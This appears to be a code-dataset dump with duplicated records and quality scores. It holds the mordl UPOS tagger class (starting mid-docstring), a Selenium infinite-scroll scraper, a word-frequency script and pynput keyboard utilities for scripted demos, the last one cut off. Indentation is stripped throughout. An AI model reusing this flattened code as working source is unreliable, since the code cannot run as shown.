**bad_epochs** (`int`; default is `5`): the maximal allowed number of
bad epochs (epochs when chosen **control_metric** is not became
better) in a row for the model's head training (stages types `1` and
`2`).
**batch_size** (`int`; default is `32`): the number of sentences per
batch for the model's head training (stages types `1` and `2`).
**max_grad_norm** (`float`; default is `None`): the gradient clipping
parameter for the model's head training (stages types `1` and `2`).
**tags_to_remove** (`dict({str: str}) | dict({str: list([str])})`;
default is `None`): the tags, tokens with those must be removed from
the corpus. It's the `dict` with field names as keys and values you
want to remove. Applied only to fields with atomic values (like
UPOS). This argument may be used, for example, to remove some
infrequent or just excess tags from the corpus. Note, that we remove
the tokens from the train corpus completely, not just replace those
tags to `None`.
*Word embedding params*:
**word_emb_type** (`str`; default is `'bert'`): one of (`'bert'` |
`'glove'` | `'ft'` | `'w2v'`) embedding types.
**word_emb_path** (`str`): the path to the word embeddings storage.
**word_transform_kwargs** (`dict`; default is `None`): keyword
arguments for the `.transform()` method of the dataset created for
sentences to word embeddings conversion. See the `.transform()` method
of either `junky.datasets.BertDataset` (if **word_emb_path** is
`'bert'`) or `junky.datasets.WordDataset` (otherwise) if you want to
learn allowed values for the parameter. If `None`, the `.transform()`
method use its defaults.
*Training stages params*:
**stage1_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_train()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `1`.
**stage2_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_tune()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `2`.
**stage3_param** (`dict`; default is `None`): keyword arguments for
the `WordEmbeddings.full_tune()` method. If `None`, the defaults are
used.
**stages** (`list([int]`; default is `[1, 2, 3, 1, 2]`): what stages
we should use during training and in which order. On the stage type
`1` the model head is trained with *Adam* optimizer; the stage type
`2` is similar, but the optimizer is *SGD*; the stage type `3` is only
relevant when **word_emb_type** is `'bert'` and we want to tune the
whole model. Stage type `0` defines the skip-stage, i.e. there would
be no real training on it. It is used when you need reproducibility
and want to continue train the model from some particular stage. In
this case, you specify the name of the model saved on that stage in
the parametere **load_from**, and put zeros into the **stages** list
on the places of already finished ones. One more time: it is used for
reproducibility only, i.e. when you put some particular value to the
**seed** param and want the data order in bathes be equivalent with
data on the stages from the past trainings.
**save_stages** (`bool`; default is `False`): if we need to keep the
best model of each stage beside of the overall best model. The names
of these models would have the suffix `_<idx>(stage<stage_type>)`
where `<idx>` is an ordinal number of the stage. We can then use it to
continue training from any particular stage number (changing next
stages or their parameters) using the parameter **load_from**. Note
that we save only stages of the head model. The embedding model as a
part of the full model usually tune only once, so we don't make its
copy.
**load_from** (`str`; default is `None`): if you want to continue
training from one of previously saved stages, you can specify the name
of the model from that stage. Note, that if your model is already
trained on stage type `3`, then you want to set param
**word_emb_path** to `None`. Otherwise, you'll load wrong embedding
model. Any other params of the model may be overwritten (and most
likely, this would cause error), but they are equivalent when the
training is just starts and when it's continues. But the
**word_emb_path** is different if you already passed stage type `3`,
so don't forget to set it to `None` in that case. (Example: you want
to repeat training on stage no `5`, so you specify in the
**load_from** param something like `'model_4(stage1)'` and set the
**word_emb_path** to `None` and the **stages_param** to
`'[0, 0, 0, 0, 2]'` (or, if you don't care of reproducibility, you
could just specify `[2]` here).
*Other options*:
**learn_on_padding** (`bool`; default is `True`): while training, we
can calculate loss either taking in account predictions made for
padding tokens or without it. The common practice is don't use padding
when calculate loss. However, we note that using padding sometimes
makes the resulting model performance slightly better.
**remove_padding_intent** (`bool`; default is `False`): if you set
**learn_on_padding** param to `False`, you may want not to use padding
intent during training at all. I.e. padding tokens would be tagged
with some of real tags, and they would just ignored during computing
loss. As a result, the model would have the output dimensionality of
the final layer less by one. On the first sight, such approach could
increase the performance, but in our experiments, such effect appeared
not always.
**seed** (`int`; default is `None`): init value for the random number
generator if you need reproducibility. Note that each stage will have
its own seed value, and the **seed** param is used to calculate these
values.
**start_time** (`float`; default is `None`): the result of
`time.time()` to start with. If `None`, the arg will be init anew.
**keep_embs** (`bool`; default is `False`): by default, after creating
`Dataset` objects, we remove word embedding models to free memory.
With `keep_embs=False` this operation is omitted, and you can use
`.embs` attribute for share embedding models with other objects.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
*The model hyperparameters*:
**rnn_emb_dim** (`int`; default is `None`): the internal character RNN
(LSTM) embedding dimensionality. If `None`, the layer is skipped.
**cnn_emb_dim** (`int`; default is `None`): the internal character CNN
embedding dimensionality. If `None`, the layer is skipped.
**cnn_kernels** (`list([int])`; default is `[1, 2, 3, 4, 5, 6]`): CNN
kernel sizes of the internal CNN embedding layer. Relevant if
**cnn_emb_dim** is not `None`.
**emb_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the embedding concatenation.
**emb_do** (`float`; default is `.2`): the dropout rate after the
embedding concatenation.
**final_emb_dim** (`int`; default is `512`): the output dimesionality
of the linear transformation applying to concatenated embeddings.
**pre_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied before the main part of the algorithm.
**pre_do** (`float`; default is `.5`): the dropout rate before the
main part of the algorithm.
**lstm_layers** (`int`; default is `1`): the number of Bidirectional
LSTM layers. If `None`, they are not created.
**lstm_do** (`float`; default is `0`): the dropout between LSTM
layers. Only relevant, if `lstm_layers` > `1`.
**tran_layers** (`int`; default is `None`): the number of Transformer
Encoder layers. If `None`, they are not created.
**tran_heads** (`int`; default is `8`): the number of attention heads
of Transformer Encoder layers. Only relevant, if `tran_layers` > `1`.
**post_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the main part of the algorithm.
**post_do** (`float`; default is `.4`): the dropout rate after the
main part of the algorithm.
The method returns the train statistics.
"""
if not start_time:
start_time = time.time()
args, kwargs = get_func_params(UposTagger.train, locals())
self._cdict = CorpusDict(
corpus=(x for x in [self._train_corpus,
self._test_corpus if self._test_corpus else
[]]
for x in x),
format='conllu_parsed', log_file=log_file
)
return super().train(self._field, None, UposTaggerModel, None,
*args, **kwargs) | mordl/upos_tagger.py | from corpuscula import CorpusDict
from junky import get_func_params
from mordl.base_tagger import BaseTagger
from mordl.defaults import BATCH_SIZE, CDICT_COEF_THRESH ,LOG_FILE, \
TRAIN_BATCH_SIZE
from mordl.upos_tagger_model import UposTaggerModel
import time
_CDICT_COEF_THRESH = .99
class UposTagger(BaseTagger):
"""
The UPOS tagger class.
Args:
**field** (`str`; default is `UPOS`): the name of the *CoNLL-U* field,
values of which needs to be predicted. With this tagger, you can predict
only fields with atomicvalues, like UPOS.
**embs** (`dict({str: object}); default is `None`): the `dict` with paths
to embeddings files as keys and corresponding embedding models as values.
If the tagger needs to load any embedding model, firstly, the model is
looked up it in that `dict`.
During init, **embs** is copied to the `embs` attribute of the creating
object, and this attribute may be used further to share already loaded
embeddings with another taggers.
"""
def __init__(self, field='UPOS', embs=None):
super().__init__(embs=embs)
self._field = field
def load(self, name, device=None,
dataset_emb_path=None, dataset_device=None, log_file=LOG_FILE):
"""Loads tagger's internal state saved by its `.save()` method.
Args:
**name** (`str`): the name of the previously saved internal state.
**device** (`str`; default is `None`): the device for the loaded model
if you want to override the value from the config.
**dataset_emb_path** (`str`; default is `None`): the path where the
dataset's embeddings to load from if you want to override the value
from the config.
**dataset_device** (`str`; default is `None`): the device for the
loaded dataset if you want to override the value from the config.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
"""
args, kwargs = get_func_params(UposTagger.load, locals())
super().load(UposTaggerModel, *args, **kwargs)
def _check_cdict(self, sentence, use_cdict_coef):
if use_cdict_coef not in [None, False]:
isfirst = True
for token in sentence[0] if isinstance(sentence, tuple) else \
sentence:
id_, form = token['ID'], token['FORM']
if form and '-' not in id_:
guess, coef = \
self._cdict.predict_tag(form, isfirst=isfirst)
isfirst = False
if coef is not None \
and coef >= (CDICT_COEF_THRESH
if use_cdict_coef is True else
use_cdict_coef):
token['UPOS'] = guess
return sentence
def predict(self, corpus, use_cdict_coef=False, with_orig=False,
batch_size=BATCH_SIZE, split=None, clone_ds=False,
save_to=None, log_file=LOG_FILE):
"""Predicts tags in the UPOS field of the corpus.
Args:
**corpus**: the corpus which will be used for the feature extraction
and predictions. May be either the name of the file in *CoNLL-U*
format or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.
**use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
we use our prediction only. If `True`, we replace our prediction to
the value returned by the `corpuscula.CorpusDict.predict_<field>()`
method if its `coef` >= `.99`. Also, you can specify your own
threshold as the value of the param.
**with_orig** (`bool`; default is `False`): if `True`, instead of just
the sequence with predicted labels, return the sequence of tuples
where the first element is the sentence with predicted labels and the
second element is the original sentence. **with_orig** can be `True`
only if **save_to** is `None`.
**batch_size** (`int`; default is `64`): the number of sentences per
batch.
**split** (`int`; default is `None`): the number of lines in sentences
split. Allows to process a large dataset in pieces ("splits"). If
**split** is `None` (default), all the dataset is processed without
splits.
**clone_ds** (`bool`; default is `False`): if `True`, the dataset is
cloned and transformed. If `False`, `transform_collate` is used
without cloning the dataset. There is no big differences between the
variants. Both should produce identical results.
**save_to** (`str`; default is `None`): the file name where the
predictions will be saved.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
Returns the corpus with tags predicted in the UPOS field.
"""
assert self._field == 'UPOS' or use_cdict_coef in [None, False], \
'ERROR: "use_cdict_coef" param may be used only with UPOS field'
args, kwargs = get_func_params(UposTagger.predict, locals())
return super().predict(self._field, None, *args, **kwargs)
def evaluate(self, gold, test=None, label=None, use_cdict_coef=False,
batch_size=BATCH_SIZE, split=None, clone_ds=False,
log_file=LOG_FILE):
"""Evaluate the tagger model.
Args:
**gold**: the corpus of sentences with actual target values to score
the tagger on. May be either the name of the file in *CoNLL-U* format
or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.
**test** (default is `None`): the corpus of sentences with predicted
target values. If `None` (default), the **gold** corpus will be
retagged on-the-fly, and the result will be used as the **test**.
**label** (`str`; default is `None`): the specific label of the target
field to be evaluated separatedly, e.g. `field='UPOS', label='VERB'`
or `field='FEATS:Animacy', label='Inan'`.
**use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
we use our prediction only. If `True`, we replace our prediction to
the value returned by the `corpuscula.CorpusDict.predict_<field>()`
method if its `coef` >= `.99`. Also, you can specify your own
threshold as the value of the param.
**batch_size** (`int`; default is `64`): the number of sentences per
batch.
**split** (`int`; default is `None`): the number of lines in sentences
split. Allows to process a large dataset in pieces ("splits"). If
**split** is `None` (default), all the dataset is processed without
splits.
**clone_ds** (`bool`; default is `False`): if `True`, the dataset is
cloned and transformed. If `False`, `transform_collate` is used
without cloning the dataset. There is no big differences between the
variants. Both should produce identical results.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
The method prints metrics and returns evaluation accuracy.
"""
args, kwargs = get_func_params(UposTagger.evaluate, locals())
return super().evaluate(self._field, *args, **kwargs)
def train(self, save_as,
device=None, control_metric='accuracy', max_epochs=None,
min_epochs=0, bad_epochs=5, batch_size=TRAIN_BATCH_SIZE,
max_grad_norm=None, tags_to_remove=None, word_emb_type='bert',
word_emb_path='xlm-roberta-base', word_transform_kwargs=None,
# BertDataset.transform() (for BERT-descendant models)
# params:
# {'max_len': 0, 'batch_size': 64, 'hidden_ids': '10',
# 'aggregate_hiddens_op': 'cat',
# 'aggregate_subtokens_op': 'absmax', 'to': junky.CPU,
# 'loglevel': 1}
# WordDataset.transform() (for other models) params:
# {'check_lower': True}
stage1_params=None,
# {'lr': .0001, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': 0, 'amsgrad': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage2_params=None,
# {'lr': .001, 'momentum': .9, 'weight_decay': 0,
# 'dampening': 0, 'nesterov': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage3_params={'save_as': None},
# {'save_as': None, 'epochs': 3, 'batch_size': 8,
# 'lr': 2e-5, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': .01, 'amsgrad': False,
# 'num_warmup_steps': 3, 'max_grad_norm': 1.}
stages=[1, 2, 3, 1, 2], save_stages=False, load_from=None,
learn_on_padding=True, remove_padding_intent=False,
seed=None, start_time=None, keep_embs=False, log_file=LOG_FILE,
rnn_emb_dim=None, cnn_emb_dim=None, cnn_kernels=range(1, 7),
emb_bn=True, emb_do=.2,
final_emb_dim=512, pre_bn=True, pre_do=.5,
lstm_layers=1, lstm_do=0, tran_layers=0, tran_heads=8,
post_bn=True, post_do=.4):
"""Creates and trains the UPOS tagger model.
During training, the best model is saved after each successful epoch.
*Training's args*:
**save_as** (`str`): the name using for save the model's head. Refer
to the `.save()` method's help for the broad definition (see the
**name** arg there).
**device** (`str`, default is `None`): the device for the model. E.g.:
'cuda:0'. If `None`, we don't move the model to any device (it is
placed right where it's created).
**control_metric** (`str`; default is `accuracy`): the metric that
control training. Any that is supported by the `junky.train()` method.
In the moment, it is: 'accuracy', 'f1', 'loss', 'precision', and
'recall'.
**max_epochs** (`int`; default is `None`): the maximal number of
epochs for the model's head training (stages types `1` and `2`). If
`None` (default), the training would be linger until **bad_epochs**
has met, but no less than **min_epochs**.
**min_epochs** (`int`; default is `0`): the minimal number of training
epochs for the model's head training (stages types `1` and `2`).
**bad_epochs** (`int`; default is `5`): the maximal allowed number of
bad epochs (epochs when chosen **control_metric** is not became
better) in a row for the model's head training (stages types `1` and
`2`).
**batch_size** (`int`; default is `32`): the number of sentences per
batch for the model's head training (stages types `1` and `2`).
**max_grad_norm** (`float`; default is `None`): the gradient clipping
parameter for the model's head training (stages types `1` and `2`).
**tags_to_remove** (`dict({str: str}) | dict({str: list([str])})`;
default is `None`): the tags, tokens with those must be removed from
the corpus. It's the `dict` with field names as keys and values you
want to remove. Applied only to fields with atomic values (like
UPOS). This argument may be used, for example, to remove some
infrequent or just excess tags from the corpus. Note, that we remove
the tokens from the train corpus completely, not just replace those
tags to `None`.
*Word embedding params*:
**word_emb_type** (`str`; default is `'bert'`): one of (`'bert'` |
`'glove'` | `'ft'` | `'w2v'`) embedding types.
**word_emb_path** (`str`): the path to the word embeddings storage.
**word_transform_kwargs** (`dict`; default is `None`): keyword
arguments for the `.transform()` method of the dataset created for
sentences to word embeddings conversion. See the `.transform()` method
of either `junky.datasets.BertDataset` (if **word_emb_path** is
`'bert'`) or `junky.datasets.WordDataset` (otherwise) if you want to
learn allowed values for the parameter. If `None`, the `.transform()`
method use its defaults.
*Training stages params*:
**stage1_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_train()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `1`.
**stage2_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_tune()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `2`.
**stage3_param** (`dict`; default is `None`): keyword arguments for
the `WordEmbeddings.full_tune()` method. If `None`, the defaults are
used.
**stages** (`list([int]`; default is `[1, 2, 3, 1, 2]`): what stages
we should use during training and in which order. On the stage type
`1` the model head is trained with *Adam* optimizer; the stage type
`2` is similar, but the optimizer is *SGD*; the stage type `3` is only
relevant when **word_emb_type** is `'bert'` and we want to tune the
whole model. Stage type `0` defines the skip-stage, i.e. there would
be no real training on it. It is used when you need reproducibility
and want to continue train the model from some particular stage. In
this case, you specify the name of the model saved on that stage in
the parametere **load_from**, and put zeros into the **stages** list
on the places of already finished ones. One more time: it is used for
reproducibility only, i.e. when you put some particular value to the
**seed** param and want the data order in bathes be equivalent with
data on the stages from the past trainings.
**save_stages** (`bool`; default is `False`): if we need to keep the
best model of each stage beside of the overall best model. The names
of these models would have the suffix `_<idx>(stage<stage_type>)`
where `<idx>` is an ordinal number of the stage. We can then use it to
continue training from any particular stage number (changing next
stages or their parameters) using the parameter **load_from**. Note
that we save only stages of the head model. The embedding model as a
part of the full model usually tune only once, so we don't make its
copy.
**load_from** (`str`; default is `None`): if you want to continue
training from one of previously saved stages, you can specify the name
of the model from that stage. Note, that if your model is already
trained on stage type `3`, then you want to set param
**word_emb_path** to `None`. Otherwise, you'll load wrong embedding
model. Any other params of the model may be overwritten (and most
likely, this would cause error), but they are equivalent when the
training is just starts and when it's continues. But the
**word_emb_path** is different if you already passed stage type `3`,
so don't forget to set it to `None` in that case. (Example: you want
to repeat training on stage no `5`, so you specify in the
**load_from** param something like `'model_4(stage1)'` and set the
**word_emb_path** to `None` and the **stages_param** to
`'[0, 0, 0, 0, 2]'` (or, if you don't care of reproducibility, you
could just specify `[2]` here).
*Other options*:
**learn_on_padding** (`bool`; default is `True`): while training, we
can calculate loss either taking in account predictions made for
padding tokens or without it. The common practice is don't use padding
when calculate loss. However, we note that using padding sometimes
makes the resulting model performance slightly better.
**remove_padding_intent** (`bool`; default is `False`): if you set
**learn_on_padding** param to `False`, you may want not to use padding
intent during training at all. I.e. padding tokens would be tagged
with some of real tags, and they would just ignored during computing
loss. As a result, the model would have the output dimensionality of
the final layer less by one. On the first sight, such approach could
increase the performance, but in our experiments, such effect appeared
not always.
**seed** (`int`; default is `None`): init value for the random number
generator if you need reproducibility. Note that each stage will have
its own seed value, and the **seed** param is used to calculate these
values.
**start_time** (`float`; default is `None`): the result of
`time.time()` to start with. If `None`, the arg will be init anew.
**keep_embs** (`bool`; default is `False`): by default, after creating
`Dataset` objects, we remove word embedding models to free memory.
With `keep_embs=False` this operation is omitted, and you can use
`.embs` attribute for share embedding models with other objects.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
*The model hyperparameters*:
**rnn_emb_dim** (`int`; default is `None`): the internal character RNN
(LSTM) embedding dimensionality. If `None`, the layer is skipped.
**cnn_emb_dim** (`int`; default is `None`): the internal character CNN
embedding dimensionality. If `None`, the layer is skipped.
**cnn_kernels** (`list([int])`; default is `[1, 2, 3, 4, 5, 6]`): CNN
kernel sizes of the internal CNN embedding layer. Relevant if
**cnn_emb_dim** is not `None`.
**emb_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the embedding concatenation.
**emb_do** (`float`; default is `.2`): the dropout rate after the
embedding concatenation.
**final_emb_dim** (`int`; default is `512`): the output dimesionality
of the linear transformation applying to concatenated embeddings.
**pre_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied before the main part of the algorithm.
**pre_do** (`float`; default is `.5`): the dropout rate before the
main part of the algorithm.
**lstm_layers** (`int`; default is `1`): the number of Bidirectional
LSTM layers. If `None`, they are not created.
**lstm_do** (`float`; default is `0`): the dropout between LSTM
layers. Only relevant, if `lstm_layers` > `1`.
**tran_layers** (`int`; default is `None`): the number of Transformer
Encoder layers. If `None`, they are not created.
**tran_heads** (`int`; default is `8`): the number of attention heads
of Transformer Encoder layers. Only relevant, if `tran_layers` > `1`.
**post_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the main part of the algorithm.
**post_do** (`float`; default is `.4`): the dropout rate after the
main part of the algorithm.
The method returns the train statistics.
"""
if not start_time:
start_time = time.time()
args, kwargs = get_func_params(UposTagger.train, locals())
self._cdict = CorpusDict(
corpus=(x for x in [self._train_corpus,
self._test_corpus if self._test_corpus else
[]]
for x in x),
format='conllu_parsed', log_file=log_file
)
return super().train(self._field, None, UposTaggerModel, None,
*args, **kwargs) | 0.866683 | 0.341143 |
import os
import time
from random import randint
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from urllib3 import ProxyManager, make_headers, PoolManager, disable_warnings
from selenium import webdriver
class InfinityRequester:
def __init__(self, url,parent_element, parent_element_classes, child_element, child_element_classes,
url_classes=None):
"""
:param url: resourse
:param parent_element: tag name
:param parent_element_classes: list of classes
:param child_element: tag name
:param child_element_classes: list of classes
"""
dir_path = os.path.dirname(os.path.realpath(__file__))
chromedriver = os.path.join(dir_path, 'drivers', 'chromedriver_win')
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument('window-size=1200x400') # optional
self.__browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
self.__url = url
self.__parent_element=parent_element
self.__parent_element_classes=parent_element_classes
self.__child_element=child_element
self.__child_element_classes=child_element_classes
self.__url_classes = url_classes
def __get_elements(self, html_content):
"""
:param html_content: html of load page
:return: dictionary {'url': html_child_content,...}
"""
result = dict()
soup = BeautifulSoup(html_content, 'html.parser')
parent = soup.find(self.__parent_element, {'class': self.__parent_element_classes})
childs = parent.find_all(self.__child_element, {'class': self.__child_element_classes})
# url extraction
for child in childs:
url = child.find('a', {'class': self.__url_classes})
result[url['href']] = child
return result
def make_get_request(self):
"""
:return: dictionary {'url': html_child_content,...}
"""
self.__browser.get(self.__url)
html_content = self.__browser.page_source
elements = self.__get_elements(html_content)
SCROLL_PAUSE_TIME = 1
last_height = self.__browser.execute_script("return document.body.scrollHeight")
new_height = 0
while new_height != last_height:
last_height = new_height
# Scroll down to bottom
self.__browser.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# upload data
html_content = self.__browser.page_source
elements.update(
self.__get_elements(html_content)
)
# Calculate new scroll height and compare with last scroll height
new_height = self.__browser.execute_script("return document.body.scrollHeight")
# TODO delete all prints
print('Scrolling...')
return elements | Requests/InfinityRequester.py | import os
import time
from random import randint
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from urllib3 import ProxyManager, make_headers, PoolManager, disable_warnings
from selenium import webdriver
class InfinityRequester:
def __init__(self, url,parent_element, parent_element_classes, child_element, child_element_classes,
url_classes=None):
"""
:param url: resourse
:param parent_element: tag name
:param parent_element_classes: list of classes
:param child_element: tag name
:param child_element_classes: list of classes
"""
dir_path = os.path.dirname(os.path.realpath(__file__))
chromedriver = os.path.join(dir_path, 'drivers', 'chromedriver_win')
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument('window-size=1200x400') # optional
self.__browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
self.__url = url
self.__parent_element=parent_element
self.__parent_element_classes=parent_element_classes
self.__child_element=child_element
self.__child_element_classes=child_element_classes
self.__url_classes = url_classes
def __get_elements(self, html_content):
"""
:param html_content: html of load page
:return: dictionary {'url': html_child_content,...}
"""
result = dict()
soup = BeautifulSoup(html_content, 'html.parser')
parent = soup.find(self.__parent_element, {'class': self.__parent_element_classes})
childs = parent.find_all(self.__child_element, {'class': self.__child_element_classes})
# url extraction
for child in childs:
url = child.find('a', {'class': self.__url_classes})
result[url['href']] = child
return result
def make_get_request(self):
"""
:return: dictionary {'url': html_child_content,...}
"""
self.__browser.get(self.__url)
html_content = self.__browser.page_source
elements = self.__get_elements(html_content)
SCROLL_PAUSE_TIME = 1
last_height = self.__browser.execute_script("return document.body.scrollHeight")
new_height = 0
while new_height != last_height:
last_height = new_height
# Scroll down to bottom
self.__browser.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# upload data
html_content = self.__browser.page_source
elements.update(
self.__get_elements(html_content)
)
# Calculate new scroll height and compare with last scroll height
new_height = self.__browser.execute_script("return document.body.scrollHeight")
# TODO delete all prints
print('Scrolling...')
return elements | 0.214445 | 0.086671 |
import operator
import re
import sys
import time
def get_word_counts(words, ignored_words):
word_counts = {}
ignored_words_dict = {}
# optimal to make a dictionary from the ignored words list
for ignored_word in ignored_words:
ignored_words_dict[ignored_word] = ignored_word
for word in words.split():
processed_word = word.lstrip('([!,.?:;-)]')
processed_word = processed_word.rstrip('([!,.?:;-)]')
processed_word = processed_word.lower()
if len(processed_word) == 0:
continue
if processed_word in word_counts:
word_counts[processed_word] = word_counts[processed_word] + 1
continue
if processed_word not in ignored_words_dict:
word_counts[processed_word] = 1
return word_counts.items()
def get_n_most_frequent(word_counts, n):
return sorted(word_counts, key=operator.itemgetter(1), reverse=True)[:n]
def start():
number_of_most_frequent_words = 1
document_text = ''
ignored_words = []
if len(sys.argv) >= 2:
number_of_most_frequent_words = int(sys.argv[1])
if len(sys.argv) >= 3:
input_file_name = sys.argv[2]
try:
with open(input_file_name) as file_object:
raw_document_text = file_object.read()
document_text = re.sub('[^!-~]+', ' ', raw_document_text).strip()
except FileNotFoundError:
print('The specified input file %s does not exist' % (input_file_name))
return
if len(sys.argv) >= 4:
ignored_words_file_name = sys.argv[3]
try:
with open(ignored_words_file_name) as file_object:
raw_document_text = file_object.read()
ignored_words = raw_document_text.split('\n')
except FileNotFoundError:
print('The specified ignored words file %s does not exist' % (ignored_words_file_name))
return
startTime = time.time()
word_counts = get_word_counts(document_text, ignored_words)
print("Counting words took %f seconds" % (time.time() - startTime))
startTime = time.time()
most_frequent_words = get_n_most_frequent(word_counts, number_of_most_frequent_words)
print("Getting top %d words took %f seconds" % (number_of_most_frequent_words, time.time() - startTime))
# print(word_counts)
print(most_frequent_words)
# example to run, "python3 word_frequency.py 10 usa-constitution.txt unimportant_words.txt
start() | word_frequency/word_frequency.py | import operator
import re
import sys
import time
def get_word_counts(words, ignored_words):
word_counts = {}
ignored_words_dict = {}
# optimal to make a dictionary from the ignored words list
for ignored_word in ignored_words:
ignored_words_dict[ignored_word] = ignored_word
for word in words.split():
processed_word = word.lstrip('([!,.?:;-)]')
processed_word = processed_word.rstrip('([!,.?:;-)]')
processed_word = processed_word.lower()
if len(processed_word) == 0:
continue
if processed_word in word_counts:
word_counts[processed_word] = word_counts[processed_word] + 1
continue
if processed_word not in ignored_words_dict:
word_counts[processed_word] = 1
return word_counts.items()
def get_n_most_frequent(word_counts, n):
return sorted(word_counts, key=operator.itemgetter(1), reverse=True)[:n]
def start():
number_of_most_frequent_words = 1
document_text = ''
ignored_words = []
if len(sys.argv) >= 2:
number_of_most_frequent_words = int(sys.argv[1])
if len(sys.argv) >= 3:
input_file_name = sys.argv[2]
try:
with open(input_file_name) as file_object:
raw_document_text = file_object.read()
document_text = re.sub('[^!-~]+', ' ', raw_document_text).strip()
except FileNotFoundError:
print('The specified input file %s does not exist' % (input_file_name))
return
if len(sys.argv) >= 4:
ignored_words_file_name = sys.argv[3]
try:
with open(ignored_words_file_name) as file_object:
raw_document_text = file_object.read()
ignored_words = raw_document_text.split('\n')
except FileNotFoundError:
print('The specified ignored words file %s does not exist' % (ignored_words_file_name))
return
startTime = time.time()
word_counts = get_word_counts(document_text, ignored_words)
print("Counting words took %f seconds" % (time.time() - startTime))
startTime = time.time()
most_frequent_words = get_n_most_frequent(word_counts, number_of_most_frequent_words)
print("Getting top %d words took %f seconds" % (number_of_most_frequent_words, time.time() - startTime))
# print(word_counts)
print(most_frequent_words)
# example to run, "python3 word_frequency.py 10 usa-constitution.txt unimportant_words.txt
start() | 0.192009 | 0.116814 |
import time
import random
import click
from pynput.keyboard import Key, Listener
from click import echo
class Trigger:
def __init__(self, key_list, verbose=False) -> None:
self.index = 0
self.keys = key_list
self.list = []
self.verbose = verbose
def return_key(self, key):
try:
# Alphanumeric key
res = key.char
except AttributeError:
# Special key
res = key
return res
def check(self, key):
self.list.append(key)
if self.return_key(key) == self.keys[self.index]:
self.index = self.index + 1
else:
self.index = 0
ans = self.index != len(self.keys)
if len(self.list) > 10:
return False
if self.verbose:
echo(f'Keys pressed since started monitoring, {len(self.list)}.')
echo(f'Pressed "{self.return_key(key)}", index is {self.index}')
return ans
# Typing: We need a function that simulates typing a string.
def type_str(line: str, keyboard, wpm: int=35, enter: bool=True, init: int=1) -> None:
time.sleep(init)
for letter in line:
keyboard.type(letter)
time.sleep(random.random()*10.0/wpm)
if enter:
keyboard.press(Key.enter)
keyboard.release(Key.enter)
# Display: Print the entire line to the screen without delay.
def display(line: str, keyboard, prefix: str='#', enter: bool=True, init: int=1) -> None:
time.sleep(init)
keyboard.type(f'{prefix} {line}')
if enter:
keyboard.press(Key.enter)
keyboard.release(Key.enter)
# Pause: Pause for specified seconds
def pause(t: float=1):
time.sleep(t)
# Pause until...
def wait(continue_key=Key.enter):
click.echo(
click.style(f'Paused. Press "{continue_key}" to continue.', blink=True, bold=True))
with Listener(on_press=lambda key: key != continue_key) as listener:
listener.join()
click.echo(
click.style('Unpaused.', bold=True))
click.clear()
# Clear: Clear the screen
def clear(keyboard):
keyboard.press(Key.ctrl_l)
keyboard.press('l')
keyboard.release('l')
keyboard.release(Key.ctrl_l)
# Function to listen for a string of letters.
def trigger(word:str, continue_key=Key.enter) -> bool:
# Key sequence to listen for...
keys = []
for letter in word:
keys.append(letter)
keys.append(continue_key)
trigger_obj = Trigger(keys)
with Listener(on_press=trigger_obj.check) as listener:
listener.join()
return True | scripted_demos/utilities.py | import time
import random
import click
from pynput.keyboard import Key, Listener
from click import echo
class Trigger:
def __init__(self, key_list, verbose=False) -> None:
self.index = 0
self.keys = key_list
self.list = []
self.verbose = verbose
def return_key(self, key):
try:
# Alphanumeric key
res = key.char
except AttributeError:
# Special key
res = key
return res
def check(self, key):
self.list.append(key)
if self.return_key(key) == self.keys[self.index]:
self.index = self.index + 1
else:
self.index = 0
ans = self.index != len(self.keys)
if len(self.list) > 10:
return False
if self.verbose:
echo(f'Keys pressed since started monitoring, {len(self.list)}.')
echo(f'Pressed "{self.return_key(key)}", index is {self.index}')
return ans
# Typing: We need a function that simulates typing a string.
def type_str(line: str, keyboard, wpm: int=35, enter: bool=True, init: int=1) -> None:
time.sleep(init)
for letter in line:
keyboard.type(letter)
